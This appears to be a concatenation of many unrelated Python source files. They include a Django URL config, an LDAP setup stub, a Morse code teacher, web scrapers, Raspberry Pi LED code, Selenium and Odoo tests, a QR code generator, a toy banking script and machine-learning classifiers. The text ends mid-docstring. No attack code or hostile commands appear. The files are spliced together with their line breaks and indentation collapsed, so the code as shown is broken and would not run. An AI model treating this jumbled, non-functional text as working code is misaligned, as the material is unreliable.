"""config URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from balance import views as balance_views urlpatterns = [ path('admin/', admin.site.urls), # URL 이 balance인 경우 애플리케이션 뷰의 main_view() 함수로 매핑된다. path('info/balance/', balance_views.main_view2), path('info/', balance_views.main_info), path('', balance_views.info), path('login/', balance_views.login), path('login/sign/', balance_views.sign_in), path('login/sign/aa/', balance_views.insert_info) # path() ]

try: from private import * except: import getpass uri = 'ldap://localhost' dc = 'dc=domain,dc=com' user_dn = 'cn=admin,' + dc user_pw = getpass.getpass("Password for %s:" % user_dn)

n = 0 while n**3 <12000: n += 1 print(n-1)

project_path = '/home/parkhi/Desktop/DIP_project' video_resource = project_path+'/data/' frame_resource = project_path+'/data/' # Any resource/pickles can be stored here. model_resource = project_path+"/data/models/"

#!/usr/bin/python import ConfigParser from morsegenerator import MorseGenerator from voicesynthetizer import Synthetizer nato = {'A': 'alfa', 'B': 'bravo', 'C': 'charli', 'D': 'delta', 'E': 'eco', 'F': 'foxtrot', 'G': 'golf', 'H': 'hotel', 'I': 'india', 'J': 'yuliet', 'K': 'kilo', 'L': 'lima', 'M': 'maik', 'N': 'november','O': 'oscar', 'P': 'papa', 'Q': 'quebec', 'R': 'romeo', 'S': 'sierra', 'T': 'tango', 'U': 'union', 'V': 'victor', 'W': 'wiski', 'X': 'exrey', 'Y': 'yanqui', 'Z': 'zulu', } class MorseTeacher: def __init__(self): self.hi = "" self.configuration() self.character = "" self.speaker = Synthetizer("festival", "spanish") self.morse = MorseGenerator() def configuration(self): self.conf = ConfigParser.ConfigParser() self.path = "configuration/configuration.morseteacher" self.conf.read(self.path) def natodecode(self, character): return nato[character.upper()] def welcome(self, section): welcome = section + 'welcome' print self.conf.get(section, welcome) self.speaker.speechit(self.conf.get(section, welcome)) def basic(self): topic = self.conf.get("basic", "basict2") #self.speaker.speechit(topic) for s in self.conf.get("basic", "basicq2"): print s de=self.natodecode(s) print de self.speaker.speechit(de) #self.speaker.speechit(s) #self.speaker.speechit(topic + " " + s + " en codigo morse es") #self.speaker.speechit(self.morse.natodecode(s)) #self.morse.generate(s) if __name__ == '__main__': mymorse = MorseTeacher() #mymorse.welcome("general") #mymorse.welcome("basic") mymorse.basic() #testg = MorseGenerator() #testg.generate("hola amor")

from Products.CMFPlone.CatalogTool import CatalogTool from collective.rooter.navroot import getNavigationRoot # Make portal_catalog's search function use a navigation root if no path # parameter is given CatalogTool._oldSearchResults = CatalogTool.searchResults def searchResults(self, REQUEST=None, **kw): if 'UID' not in kw\ and 'path' not in kw\ and (REQUEST is None or 'path' not in REQUEST): # Root catalog searches to the navigation root, except if path or UID # are explicitly given. root = getNavigationRoot() if root is not None: kw = kw.copy() kw['path'] = '/'.join(root.getPhysicalPath()) return CatalogTool._oldSearchResults(self, REQUEST, **kw)

# import library that allows us to pull data from websites import requests # source 1 # requests data from url below request = requests.get('https://www.adl.org/hate-symbols') content = request.content # imports library that allows for us to pick what parts of the content to pull from bs4 import BeautifulSoup # stores all of the site's content soup = BeautifulSoup(content) # filters soup to only display what is specified specificData = soup.find_all('img') # finds and prints alternative text for images at above url for x in specificData: print(x['alt']) # source 2 # requests data from url below request = requests.get('https://archive.attn.com/stories/7307/common-expressions-words-that-are-sexist') content = request.content # imports library that allows for us to pick what parts of the content to pull from bs4 import BeautifulSoup # stores all of the site's content soup = BeautifulSoup(content) # filters soup to only display what is specified specificData = soup.find_all('h2') # finds and prints text from chart at above url for z in specificData: print(z.find(text=True)[3:])

import sys sys.setrecursionlimit(100000) n, m, root = map(int, sys.stdin.readline().split(' ')) children = [[] for ix in range(n)] cs = [] for ix in range(n - 1): h, t = map(lambda x: int(x) - 1, sys.stdin.readline().split(' ')) children[h].append(t) children[t].append(h) for ix in range(n): c = int(sys.stdin.readline()) cs.append(c) cns = [None for ix in range(n)] #def bt(n, visited = set()): # r = set([cs[n]]) # visited.add(n) # for cix in children[n]: # if cix not in visited: # r.update(bt(cix, visited)) # cns[n] = len(r) # return r def bt(n): fr = [(n, True, None, None)] visited = set() r = set() while len(fr) > 0: n, f, p, s = fr.pop() if f: r = set() visited.add(n) lst = [] for cix in children[n]: if cix not in visited: lst.append(cix) fr.append((n, False, lst, set([cs[n]]))) else: if len(p) == 0: s.update(r) cns[n] = len(s) r = s else: ix = p.pop() s.update(r) fr.append((n, False, p, s)) fr.append((ix, True, None, None)) bt(root - 1) for ix in range(m): q = int(sys.stdin.readline()) - 1 print cns[q]

import argparse import tensorflow as tf import tensorflow.keras as keras import mnist import special import tensorflow.keras.backend as K import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation from matplotlib.animation import FuncAnimation import os from os.path import join as pjoin #%% if __name__ == '__main__': parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument( "--model", action="store", dest="model", help="path to the saved model" ) parser.add_argument( "--output_folder", action="store", dest="output_folder", help="path to the output folder" ) parser.add_argument( "--num_bits", action="store", dest="num_bits", type=int,default=25, help="Number of bits to generate" ) parser.add_argument( "--num_images", action="store", dest="num_images", type=int,default=24, help="Number of images to generate (uses the first num_images of the test set)" ) args = parser.parse_args() output_f = args.output_folder os.makedirs(output_f,exist_ok=True) num_bits = args.num_bits num_images = 32 full_model = keras.models.load_model(args.model,compile=False, custom_objects=special.custom_objs) encoder = full_model.get_layer('encoder') latent = full_model.get_layer('latent_params') latent_sampler = full_model.get_layer('geosampler') decoder = full_model.get_layer('decoder') x_train,x_test,_,_ = mnist.get_data() input_data = x_test[:num_images] encoder_out = encoder.predict(input_data) latent_params = latent.predict(encoder_out) latent_out = latent_sampler.predict(latent_params) # decoded_latent = decoder.predict(latent_out) def predict_partial(num_bits): masked_vals = latent_out.copy() masked_vals[:,num_bits:] = 0 return decoder.predict(masked_vals) results_list = [] for bit_num in range(1,num_bits+1): results_list.append(predict_partial(bit_num)[...,0]) for image_num in range(num_images): fig, ax = plt.subplots() ims = [] for frame_idx,frame in enumerate(results_list): im = plt.imshow(frame[image_num], animated=True) title = latent_out[image_num,:frame_idx+1].copy() title[title==-1] = 0 title = ''.join([str(x) for x in np.uint8(title).tolist()]) title = ax.text(0.5,1.05,title, size=plt.rcParams["axes.titlesize"], ha="center", transform=ax.transAxes, ) ims.append([im,title]) ani = animation.ArtistAnimation(fig, ims, interval=500, blit=False, repeat_delay=1000) ani.save(pjoin(output_f,'idx_'+str(image_num)+'.gif'),writer='imagemagick') plt.close()

from bs4 import BeautifulSoup import urlparse import requests class Extract_links(object): unvisited_for_current_link=[] #this list is used to store all the unvisited links in this class then will be merged with main unvisited list def __init__(self,get_soup, visited, old_unvisited_links, url): self.get_soup = get_soup self.visited = visited self.url = url self.old_unvisited_links = old_unvisited_links def fetch_links(self): for link in self.get_soup.find_all("a"): #looks for links with <a> in that link new_tag=urlparse.urljoin(self.url,link.get("href")) #link.get() is used to take the href info of the link and then url join is used to join it to the prefix of the "url" in case it don't have it if self.url in new_tag and new_tag not in self.visited: link=[new_tag] #makes the new_tag a list called link if new_tag not in self.unvisited_for_current_link and new_tag not in self.old_unvisited_links: #this condition avoids repetitions self.unvisited_for_current_link = self.unvisited_for_current_link + link # to merge all the unvisited links together return self.unvisited_for_current_link

# Imports import os import numpy as np import argparse import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt from cosmo_utils.helpers import yyyymmddhhmmss_strtotime, make_timelist, \ yyyymmddhhmmss from datetime import timedelta # Arguments parser = argparse.ArgumentParser(description = 'Process input') parser.add_argument('--expid', metavar = 'expid', type=str, nargs = '+') parser.add_argument('--date_ini', metavar = 'date_ini', type=str, default = '20160525000000') parser.add_argument('--date_end', metavar = 'date_end', type=str, default = '20160610000000') parser.add_argument('--date', metavar = 'date', type=str, nargs = '+') parser.add_argument('--time', metavar = 'time', type=str, nargs = '+') args = parser.parse_args() exptag = '' for exp in args.expid: exptag += exp + '_' exptag = exptag[:-1] savedir = '/e/uwork/extsrasp/save/' + exptag + '/prec_time/' plotdir = '/e/uwork/extsrasp/plots/' + exptag + '/prec_time/' if not os.path.exists(plotdir): os.makedirs(plotdir) # Loop over time tstart = yyyymmddhhmmss_strtotime(args.date_ini) tend = yyyymmddhhmmss_strtotime(args.date_end) tint = timedelta(days=1) if tstart == tend: timelist = [tstart] else: timelist = make_timelist(tstart, tend, tint) matlist = [] for t in timelist: savefn = savedir + yyyymmddhhmmss(t) + '_' + str(args.time[0]) + '_' + str(args.time[1]) tplot, savemat, labelslist = np.load(savefn + '.npy') matlist.append(savemat) cdict = {'radar':'k', 'REF':'b', 'REF_TL500':'green', 'PSP_TL500':'r', #'sig1':'green', #'time20':'orange', #'time10':'orange', #'const3':'purple', #'const1':'purple', #'nolowest':'gray', #'ref_tl500':'lightblue', #'std2_tl500':'darkblue', } lwdict = {'radar':2, 'REF':2, 'REF_TL500':2, 'PSP_TL500':2, #'sig1':1.5, #'time20':1.5, #'time10':1.5, #'const3':1.5, #'const1':1.5, #'nolowest':1.5, #'ref_tl500':1.5, #'std2_tl500':1.5, } lsdict = {'radar':'-', 'REF':'-', 'REF_TL500':'-', 'PSP_TL500':'-', #'sig1':'--', #'time20':'-', #'time10':'--', #'const3':'-', #'const1':'--', #'nolowest':'-', #'ref_tl500':'-', #'std2_tl500':'-', } savemat = np.mean(matlist, axis = 0) fig, ax = plt.subplots(1, 1, figsize = (6, 4)) for i in range(savemat.shape[1]): l = labelslist[i] ax.plot(tplot, savemat[:,i], c = cdict[l], label = l, linewidth = lwdict[l], linestyle = lsdict[l]) ax.legend(loc = 2, fontsize = 6) ax.set_xlabel('time [UTC]') ax.set_ylabel('di prec [mm/h]') ax.set_title(args.date_ini + '_' + args.date_end) plt.tight_layout() plotstr = (args.date_ini + '_' + args.date_end + '_' + str(args.time[0]) + '_' + str(args.time[1])) print 'Saving as ', plotdir + plotstr plt.savefig(plotdir + plotstr, dpi = 150) plt.close('all')

import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BOARD) GPIO.setup(11,GPIO.OUT) #set pin 11 as out GPIO.setup(13,GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 13 as input def Button (channel): #this function will be called when the button is pressed GPIO.output(11,1) #Turn ON the LED GPIO.add_event_detect(13, GPIO.FALLING,callback= Button,bouncetime=200) #interupt that will call the button function try: while 1: if (GPIO.input(13)==1): # this check if the switch is is not pressed GPIO.output(11,0) # and if the switch is not pressed this part switches Led OFF except KeyboardInterrupt: GPIO.remove_event_detect(13) GPIO.cleanup()

try: i=int(input()) except Exception as e: print(e) else: print("every thing is good") finally: print("the entered number is")

# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('polls', '0002_auto_20150314_0215'), ] operations = [ migrations.DeleteModel( name='Accolades', ), migrations.RenameField( model_name='incident', old_name='incident_text', new_name='name', ), migrations.RenameField( model_name='update', old_name='update', new_name='incident', ), migrations.RemoveField( model_name='incident', name='players', ), migrations.DeleteModel( name='Player', ), migrations.RemoveField( model_name='incident', name='title', ), migrations.AddField( model_name='incident', name='crime', field=models.TextField(default='x'), preserve_default=False, ), migrations.AddField( model_name='update', name='headline', field=models.CharField(default='x', max_length=200), preserve_default=False, ), migrations.AddField( model_name='update', name='update_text', field=models.TextField(default='x'), preserve_default=False, ), ]

import sys from numpy import * from matplotlib import pyplot as plt #xvar = array([1,2,3,4,5]) #yvar = xvar*2 xvar, yvar = loadtxt("../data/data.csv", unpack=True, delimiter=',') plt.clf() plt.plot(xvar,yvar,'rx') plt.plot(xvar,yvar,'b') plt.xlim((0,6)) plt.ylim((0,12)) plt.xlabel("My X Variable") plt.ylabel("My Y Variable") plt.title("My First Python Plot") plt.savefig("../fig/fig_first_plot.png") plt.show()

def urai(word): huruf = '' #list kosong untuk menampung hasil looping 1 char_2 = '' #list kosong untuk menampung hasil looping 2 for i in range(1,len(word)+1): #untuk looping pertama huruf = huruf + word[0:i] for j in range(len(word)-1): #untuk looping kedua char_2 = char_2 + word[j:] return huruf + char_2 print(urai('Code')) print(urai('Python'))

import time import pytest from .pages.product_page import BookOrderPage from .pages.basket_page import BasketPage from .pages.login_page import LoginPage links = ["http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer0"] @pytest.mark.need_review @pytest.mark.parametrize('link', links) def test_guest_can_add_product_to_basket(browser, link): page = BookOrderPage(browser, link) page.open() title = page.get_product_title() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_be_at_messages(title) def test_guest_should_see_login_link_on_product_page(browser): link = "http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/" page = BookOrderPage(browser, link) page.open() page.should_be_login_link() @pytest.mark.need_review def test_guest_can_go_to_login_page_from_product_page(browser): link = "http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/" page = BookOrderPage(browser, link) page.open() page.go_to_login_page() login_page = LoginPage(browser, browser.current_url) login_page.should_be_login_page() @pytest.mark.skip @pytest.mark.parametrize('link', links) def test_guest_cant_see_success_message_after_adding_product_to_basket(browser, link): page = BookOrderPage(browser, link) page.open() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_not_be_at_messages() @pytest.mark.skip @pytest.mark.parametrize('link', links) def test_message_disappeared_after_adding_product_to_basket(browser, link): page = BookOrderPage(browser, link) page.open() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_be_disappeared_messages() @pytest.mark.need_review @pytest.mark.parametrize('link', links) def test_guest_cant_see_product_in_basket_opened_from_product_page(browser, link): page = BookOrderPage(browser, link) page.open() page.go_to_basket_page() basket_page = BasketPage(browser, browser.current_url) basket_page.should_be_empty_basket() basket_page.should_be_empty_msg() @pytest.mark.parametrize('link', links) class TestUserAddToBasketFromProductPage: @pytest.fixture(autouse=True) def setup(self, browser, link): page = BookOrderPage(browser, link) page.open() page.go_to_login_page() login_page = LoginPage(browser, browser.current_url) email = f"{str(time.time())}@fakemail.org" login_page.register_new_user(email=email, password="Siber!550") login_page.should_be_authorized_user() def test_user_cant_see_success_message(self, browser, link): page = BookOrderPage(browser, link) page.open() page.should_not_be_at_messages() @pytest.mark.need_review def test_user_can_add_product_to_basket(self, browser, link): page = BookOrderPage(browser, link) page.open() title = page.get_product_title() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_be_at_messages(title)

import asyncio from django.core.management import BaseCommand from backend.user_service.user.infra.adapter.user_create_command_handler \ import UserCreateCommandHandler from backend.user_service.user.infra.adapter.user_point_update_command_handler \ import UserPointUpdateCommandHandler from backend.user_service.user.infra.adapter.user_login_event_handler \ import UserLoginEventHandler from backend.user_service.user.infra.adapter.user_logout_event_handler \ import UserLogoutEventHandler from backend.user_service.user.app.user_application_service \ import UserApplicationService from backend.common.messaging.infra.redis.redis_message_subscriber \ import RedisMessageSubscriber from backend.common.command.user_create_command \ import USER_CREATE_COMMAND from backend.common.command.user_point_update_command \ import USER_POINT_UPDATE_COMMAND from backend.common.event.user_login_event \ import USER_LOGIN_EVENT from backend.common.event.user_logout_event \ import USER_LOGOUT_EVENT from backend.common.rpc.infra.adapter.redis.redis_rpc_server \ import RedisRpcServer from backend.common.utils.signal_handler \ import register_signal_handler, shutdown_process class Command(BaseCommand): user_application_service = UserApplicationService() user_point_update_command_handler = UserPointUpdateCommandHandler( user_application_service=user_application_service) user_create_command_handler = UserCreateCommandHandler( user_application_service=user_application_service) user_login_event_handler = UserLoginEventHandler( user_application_service=user_application_service) user_logout_event_handler = UserLogoutEventHandler( user_application_service=user_application_service ) subscriber = RedisMessageSubscriber() rpc_server = RedisRpcServer() def handle(self, *args, **options): loop = asyncio.get_event_loop() register_signal_handler(loop, shutdown_process) async def main(): """ create subscription tasks """ user_create_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_CREATE_COMMAND, message_handler=self.user_create_command_handler)) user_create_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_CREATE_COMMAND, request_handler=self.user_create_command_handler)) user_point_update_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_POINT_UPDATE_COMMAND, message_handler=self.user_point_update_command_handler)) user_point_update_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_POINT_UPDATE_COMMAND, request_handler=self.user_point_update_command_handler)) user_login_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_LOGIN_EVENT, message_handler=self.user_login_event_handler)) user_login_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_LOGIN_EVENT, request_handler=self.user_login_event_handler)) user_logout_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_LOGOUT_EVENT, message_handler=self.user_logout_event_handler)) user_logout_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_LOGOUT_EVENT, request_handler=self.user_logout_event_handler)) """ wait until application stop """ await asyncio.gather( user_create_subscription_task, user_create_rpc_task, user_point_update_subscription_task, user_point_update_rpc_task, user_login_subscription_task, user_login_rpc_task, user_logout_subscription_task, user_logout_rpc_task, ) loop.create_task(main()) loop.run_forever()

# -*- coding:UTF-8 -*- u''' ****************************************************************************** * 文件：GDC03849.py * 概述：ht1621x芯片驱动GDC03849段式液晶的程序,显示范围-99.99-999.99 * 版本：V0.10 * 作者：Robin Chen * 日期：2018年5月9日 * 历史：日期编辑版本记录 2018年5月9日 Robin Chen V0.10 创建文件 ******************************************************************************''' from PYBNano.DisplayModule.LCD.HT1621B.ht1621x import * # 16进制湿度字库(0~9,包含湿度文字、小数点及湿度单位显示) NUMCODE_RH_HEX = ((0x0D,0x0F),\ (0x08,0x06),\ (0x0B,0x0D),\ (0x0A,0x0F),\ (0x0E,0x06),\ (0x0E,0x0B),\ (0x0F,0x0B),\ (0x08,0x0E),\ (0x0F,0x0F),\ (0x0E,0x0F)) # 16进制温度字库(0~9,包含温度文字、小数点及温度单位显示) NUMCODE_TEMP_HEX = ((0x0F,0x0D),\ (0x06,0x08),\ (0x0B,0x0E),\ (0x0F,0x0A),\ (0x06,0x0B),\ (0x0D,0x0B),\ (0x0D,0x0F),\ (0x07,0x08),\ (0x0F,0x0F),\ (0x0F,0x0B)) u'''************************************************************************* * 功能：显示温度值 * 说明：将进制制浮点数温度值以两位小数的形式显示出来 * 输入参数： data: 测量到的温度值 | flot | de | 000.00~999.99 | eg. 24.543 * 输出参数：None * 返回值：True **************************************************************************''' def viewTemp(data): val = () stda= ('00000' + str(int(data*100)))[-5::] stda=list(stda)[::-1] for i in stda: val=val + NUMCODE_TEMP_HEX[int(i)] HT1621xWrAllData(0x0A, val) return True u'''************************************************************************* * 功能：显示湿度值 * 说明：将进制制浮点数湿度值以两位小数的形式显示出来 * 输入参数： data: 测量到的湿度值 | flot | de | 000.00~999.99 | eg. 24.543 * 输出参数：None * 返回值：True **************************************************************************''' def viewRH(data): val=() stda= ('00000' + str(int(data*100)))[-5::] for i in stda: val=val + NUMCODE_RH_HEX[int(i)] HT1621xWrAllData(0x00, val) return True u'''************************************************************************* * 功能：显示所有显示字段 * 说明： * 输入参数：NONE * 输出参数：None * 返回值：True **************************************************************************''' def LCDALLSHOW(): ALLSHOW(0x00,20) return True u'''************************************************************************* * 功能：清除屏幕全部显示 * 说明： * 输入参数：None * 输出参数：None * 返回值：True **************************************************************************''' def LCDALLCLEAR(): ALLCLEAR(0x00,20) return True u'''************************************************************************* * 功能：清除屏幕温度区域显示 * 说明： * 输入参数：None * 输出参数：None * 返回值：True **************************************************************************''' def TEMPCLEAR(): ALLCLEAR(0x0A,10) return True u'''************************************************************************* * 功能：清除屏幕湿度区显示 * 说明： * 输入参数：None * 输出参数：None * 返回值：True **************************************************************************''' def RHCLEAR(): ALLCLEAR(0x00, 10) return True #初始化LCD lcdinit() LCDALLSHOW() sleep(1) LCDALLCLEAR()

import time from ops import * #from utils import * def network( x,training,res_n=10, reuse=False): """ Args: x: the input of the network,a tensor of size [batch_size, height,width,channel] training: if training res_n: the number of the blocks to use for each layer Returns: the output of each layer(conv1,conv2,conv3,conv4,conv5) """ with tf.variable_scope("network", reuse=reuse): if res_n < 50: residual_block = resblock else: residual_block = bottle_resblock residual_list = get_residual_layer(res_n) ch = 64 # paper is 64 x = conv(x, ch,training,name='block/conv0',kernel=7, stride=2, scope='conv') conv1 = relu(x) print(conv1) print(x) x=pool('maxpooling', x, ksize=None, stride=None, is_max_pool=True) ######################################################################################################## x = residual_block(x, ch ,training,first=True, downsample=False, scope='resblock0_0') print(x) for i in range(1,residual_list[0]): x = residual_block(x,ch, training, downsample=False, scope='resblock0_' + str(i)) print(x) conv2 = relu(x) print(conv2) ######################################################################################################## x = residual_block(x, ch * 2,training,first=True, downsample=True, scope='resblock1_0') print(x) for i in range(1, residual_list[1]): x = residual_block(x, ch * 2, training, downsample=False, scope='resblock1_' + str(i)) print(x) conv3 =relu(x) print(conv3) ######################################################################################################## x = residual_block(x, ch * 4,training,first=True, downsample=True, scope='resblock2_0') print(x) for i in range(1, residual_list[2]): x = residual_block(x,ch * 4, training, downsample=False, scope='resblock2_' + str(i)) print(x) conv4 =relu(x) print(conv4) ######################################################################################################## x = residual_block(x,ch * 8,training,first=True, downsample=True, scope='resblock3_0') print(x) for i in range(1,residual_list[3]): x = residual_block(x, ch * 8, training, downsample=False, scope='resblock_3_' + str(i)) print(x) conv5 =relu(x) print(conv5) ######################################################################################################## return conv1,conv2,conv3,conv4,conv5

import pyqrcode import png from datetime import date def barcodeGenerator(order_id, event_name, ref_code, order_uuid, user_order): today_date = date.today() order_details = "AFRIVENT \ \n ORDER {0} CONFIRMED For {1}, \ \n Payment ID: {2} \ \n Unique Order Id: {3} \ \n Ordered By: {4} On {5}".format(order_id, event_name, ref_code, order_uuid, user_order, today_date ) url = pyqrcode.create(order_details) image_as_str = url.png_as_base64_str(scale=5) image_as_str = "data:image/png;base64,{}".format(image_as_str) # url.png('{}.png'.format(order_id), scale=4) print("Printing QR code") # print(url.terminal(quiet_zone=1)) return image_as_str

# username = input('Your username ') # Email = input('your email ') # password = input('choose a suitable password ') # fullname = input('what is your fullname? ') f = open("staff.txt",'w') staffDetails = str("1." )+str("Tara, Taradebby@gmail.com, Taradee, Omotara Kuds \n") f.write(staffDetails) f = open("staff.txt",'a') staffDetails2 = str("2. " )+str("korede, korede419@gmail.com, smarter, Korede Ibukunoluwa") f.write(staffDetails2) f.close() f = open("customer.txt", "w") print("Welcome to the SN Banking App \n ") Login = input("To LOGIN type-> login" + "\n" +"To CLOSE type-> close \n") # print("To CLOSE type-> close \n") action = True while action: if Login == "login": username =input("Username: ") password =input("Password: ") checkIn = input("To CREATE NEW BANK ACCOUNT type-> new" + "\n" + "To CHECK ACCOUNT BALANCE type-> balance \n"+"To LOGOUT type-> logout \n") activity = True while activity: if checkIn == "new": account_name = input("Account Name: ") account_balance = input("Account Balance: ") account_type = input("Account Type: ") account_email = input("Account email: ") account_number = input("Account Number: ") f=open("customer.txt", "a") f.write(account_number) f.close() elif checkIn == "balance": account_number = input("What is your Account Number: ") f = open("customer.txt", "r") print(f.read()) elif checkIn == "logout": print("lets go again") breakpoint() if Login == "close": print("Thank you for using this app.") break

#coding=utf-8 import sys sys.path.append("../") from src import verbalGraphGenerator import random from src import logger import logging import uuid from src import utils from src import constants import argparse import codecs import os import time import pdb import json import regular_test sentences = regular_test.get_sentence(file_path="../doc/output") with codecs.open("../doc/output1",'w','utf-8') as f: for k,v in sentences.items(): f.write(v[0]) f.write('\t') f.write(k+"\n")

#Relational / Comparison Operators a=3 b=3 print(a==b) a=4 b=5 print(a!=b) a=2 b=6 print(a>b) a=5 b=6 print(a<b) a=6 b=7 print(a>b) a=8 b=7 print(a>b) a=3 b=4 print(a<=b) a=9 b=4 print(a<=b) a=5 b=9 print(a>b) a=5 b=9 print(a>=b) a=8 b=4 print(a>b) a=15 b=9 print(a>=b)

# -*- encoding: utf-8 -*- from odoo.addons.account.tests.account_test_savepoint import AccountTestInvoicingCommon from odoo import fields from odoo.tests import tagged from odoo.tests.common import Form @tagged('post_install', '-at_install') class TestBillsPrediction(AccountTestInvoicingCommon): @classmethod def setUpClass(cls, chart_template_ref=None): super().setUpClass(chart_template_ref=chart_template_ref) cls.test_partners = cls.env['res.partner'].create([{'name': 'test partner %s' % i} for i in range(7)]) expense_type = cls.env.ref('account.data_account_type_expenses') cls.test_accounts = cls.env['account.account'].create({ 'code': 'test%s' % i, 'name': name, 'user_type_id': expense_type.id, 'company_id': cls.company_data['company'].id, } for i, name in enumerate(( "Test Maintenance and Repair", "Test Purchase of services, studies and preparatory work", "Test Various Contributions", "Test Rental Charges", "Test Purchase of commodity", ))) cls.frozen_today = fields.Date.today() def _create_bill(self, vendor, line_name, expected_account, account_to_set=None): ''' Create a new vendor bill to test the prediction. :param vendor: The vendor to set on the invoice. :param line_name: The name of the invoice line that will be used to predict. :param expected_account: The expected predicted account. :param account_to_set: The optional account to set as a correction of the predicted account. :return: The newly created vendor bill. ''' invoice_form = Form(self.env['account.move'].with_context(default_type='in_invoice')) invoice_form.partner_id = vendor invoice_form.invoice_date = self.frozen_today with invoice_form.invoice_line_ids.new() as invoice_line_form: # Set the default account to avoid "account_id is a required field" in case of bad configuration. invoice_line_form.account_id = self.company_data['default_journal_purchase'].default_credit_account_id invoice_line_form.quantity = 1.0 invoice_line_form.price_unit = 42.0 invoice_line_form.name = line_name invoice = invoice_form.save() invoice_line = invoice.invoice_line_ids self.assertEqual( invoice_line.account_id, expected_account, "Account '%s' should have been predicted instead of '%s'" % ( expected_account.display_name, invoice_line.account_id.display_name, ), ) if account_to_set: invoice_line.account_id = account_to_set invoice.post() return invoice def test_account_prediction_flow(self): default_account = self.company_data['default_journal_purchase'].default_debit_account_id self._create_bill(self.test_partners[0], "Maintenance and repair", self.test_accounts[0]) self._create_bill(self.test_partners[5], "Subsidies obtained", default_account, account_to_set=self.test_accounts[1]) self._create_bill(self.test_partners[6], "Prepare subsidies file", self.test_accounts[1]) self._create_bill(self.test_partners[1], "Contributions January", self.test_accounts[2]) self._create_bill(self.test_partners[2], "Coca-cola", default_account, account_to_set=self.test_accounts[4]) self._create_bill(self.test_partners[1], "Contribution February", self.test_accounts[2]) self._create_bill(self.test_partners[3], "Electricity Bruxelles", default_account, account_to_set=self.test_accounts[3]) self._create_bill(self.test_partners[3], "Electricity Grand-Rosière", self.test_accounts[3]) self._create_bill(self.test_partners[2], "Purchase of coca-cola", self.test_accounts[4]) self._create_bill(self.test_partners[4], "Crate of coca-cola", self.test_accounts[4]) self._create_bill(self.test_partners[1], "March", self.test_accounts[2]) def test_account_prediction_with_product(self): product = self.env['product.product'].create({ 'name': 'product_a', 'lst_price': 1000.0, 'standard_price': 800.0, 'property_account_income_id': self.company_data['default_account_revenue'].id, 'property_account_expense_id': self.company_data['default_account_expense'].id, }) invoice_form = Form(self.env['account.move'].with_context(default_type='in_invoice')) invoice_form.partner_id = self.test_partners[0] invoice_form.invoice_date = self.frozen_today with invoice_form.invoice_line_ids.new() as invoice_line_form: invoice_line_form.product_id = product invoice_line_form.name = "Maintenance and repair" invoice = invoice_form.save() self.assertRecordValues(invoice.invoice_line_ids, [{ 'name': "Maintenance and repair", 'product_id': product.id, 'account_id': self.company_data['default_account_expense'].id, }])

# @Time : 2018/3/7 16:15 # @Author : Jing Xu import threading import requests from bs4 import BeautifulSoup def gettitle(page): url = "https://movie.douban.com/top250?start={}&filter=".format(page * 25) r = requests.get(url) soup = BeautifulSoup(r.content, "html.parser") lis = soup.find("ol", class_="grid_view").find_all("li") print(threading.current_thread()) for li in lis: title = li.find("span", class_="title").text print(title) class MyThread(threading.Thread): def __init__(self, target, **args): threading.Thread.__init__(self) self.target = target self.args = args def run(self): self.target(**self.args) for i in range(10): th = MyThread(gettitle, page=i) th.start()

import numpy as np import pandas as pd # pip install pandas from sklearn.naive_bayes import GaussianNB # pip install sklearn from sklearn.neighbors import KNeighborsClassifier from sklearn import svm from sklearn import tree # from sklearn.model_selection.cross_validation import cross_val_predict from sklearn.model_selection import train_test_split from sklearn.metrics import confusion_matrix from matplotlib import pyplot as plt from matplotlib.ticker import NullFormatter from matplotlib import gridspec def niave_gaussian_probabilities(inputs_test, inputs_train, lbl_np1d_train): """Trains a niave gaussian model. Args: inputs_test (np.array): Training dataset inputs_train (np.array): Training dataset lbl_np1d_train (np.array): Training labels Returns: all_probs (np.array): Estimated probabilites of each sample for each class, shape (n_samples, n_classes) model: Trained model """ gnb = GaussianNB() model = gnb.fit(inputs_train, lbl_np1d_train) all_probs = model.predict_proba(inputs_test) return all_probs, model def knn_probabilities(inputs_test, inputs_train, lbl_np1d_train, k): """Trains a KNN model. Args: inputs_test (np.array): Testing dataset inputs_train (np.array): Training dataset lbl_np1d_train (np.array): Training labels k (uint): Number of neighbors Returns: all_probs (np.array): Estimated probabilites of each sample for each class, shape (n_samples, n_classes) model Trained model """ ############################### ########## FILL IN ############ ############################### knn = KNeighborsClassifier(n_neighbors=k) model = knn.fit(inputs_train, lbl_np1d_train) all_probs = model.predict_proba(inputs_test) ############################### return all_probs, model def dt_probabilities(inputs_test, inputs_train, lbl_np1d_train, maxDepth=None): """Trains a decision tree model. Args: inputs_test (np.array): Testing dataset inputs_train (np.array): Training dataset lbl_np1d_train (np.array): Training 